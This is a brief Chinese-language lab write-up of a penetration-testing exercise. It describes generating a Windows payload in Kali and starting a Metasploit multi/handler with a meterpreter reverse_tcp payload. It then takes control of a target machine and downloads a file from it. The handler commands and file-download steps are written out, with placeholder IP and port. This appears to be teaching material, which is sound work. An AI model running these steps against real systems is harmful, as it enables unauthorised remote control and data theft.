一、实验目的
1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。
二、步骤
1、在kali中生成被控端
在-o指定的路径看到生成的被控端文件payload.exe
2、在kali中打开主控端
输入msfconsole来启动Metasploit
3、在Metasploit其中分别输入指令
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost [ip地址]
set lport[端口号]
exploit
将在kali生成的payload.exe文件移动至Window靶机中,在靶机中执行,之后kali中出现以下提示
获得靶机控制权后,输入指令load -l查询可以对靶机执行的指令
4、下载靶机上的一个文件
1、使用pwd命令查看当前命令操作的目录,然后使用ls命令查看当前操作目录的文件
2、使用download +文件名命令下载靶机上指定文件